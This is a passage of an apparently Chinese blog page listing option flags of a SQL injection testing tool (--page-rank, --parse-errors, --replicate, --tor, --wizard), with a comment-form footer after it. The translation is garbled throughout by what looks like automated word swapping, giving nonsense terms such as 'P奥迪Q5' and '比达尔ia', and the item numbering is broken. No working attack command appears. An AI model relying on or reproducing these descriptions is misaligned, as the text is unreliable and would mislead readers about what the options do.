 16九. –page-rank 谷歌(Google) dork 结果呈现网页排行(P奥迪Q5)

  1. –parse-errors 从响应页面解析数据库管理种类的一无所长音讯

  17一. –replicate 复制转储的数码到2个 sqlite3 数据库  

 17二. –tor 使用暗许的 Tor(比达尔ia/ Privoxy/ Polipo)代理地址  

  1. –wizard 给初级用户的回顾向导分界面


相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图